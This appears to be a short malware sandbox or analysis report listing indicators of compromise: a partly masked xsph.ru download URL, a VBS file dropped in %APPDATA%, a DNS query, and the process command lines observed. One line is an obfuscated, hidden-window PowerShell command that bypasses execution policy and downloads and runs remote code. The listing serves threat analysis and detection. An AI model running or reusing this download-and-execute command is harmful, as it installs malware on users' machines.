Technical Information
- http://f0####64.xsph.ru/download/uac.php
- %APPDATA%\atr.vbs
- DNS ASK f0####64.xsph.ru
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\atr.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://f0####64.xsph.ru/download/UAC.php')' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %APPDATA%\atr.vbs